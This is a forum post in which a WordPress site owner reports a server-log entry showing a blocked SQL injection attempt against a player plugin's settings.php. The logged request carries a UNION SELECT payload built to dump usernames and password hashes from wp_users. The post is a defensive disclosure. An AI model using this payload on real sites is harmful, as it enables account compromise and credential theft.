I don’t use this plugin for my own site, but I found this line in my server log today:
27.155.*.* – – [26/Apr/2013:21:36:44 +0000] “GET /wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users– HTTP/1.0” 403 1090 “-” “-“
Clearly, someone tried to exploit WordPress using this plugin so that a list of users and passwords would get returned. I don’t know if this vulnerability has been fixed already, I just wanted to make sure it doesn’t go unnoticed in any case.
The request was blocked by Bad Behavior for “URL pattern found on blacklist”; the assault came from China.
- The topic ‘GET request vulnerability?’ is closed to new replies.